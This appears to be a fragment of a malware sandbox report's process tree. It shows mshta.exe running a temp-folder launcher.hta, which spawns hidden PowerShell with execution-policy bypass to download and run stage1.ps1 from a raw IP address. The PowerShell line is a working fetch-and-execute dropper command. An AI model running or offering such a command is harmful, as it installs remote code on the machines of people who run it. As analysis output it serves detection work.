mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\launcher.hta
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -ep bypass -c iex (iwr -UseBasicParsing http://212.227.245.12/stage1.ps1)
No process loaded Click on a process in the tree above to load its data.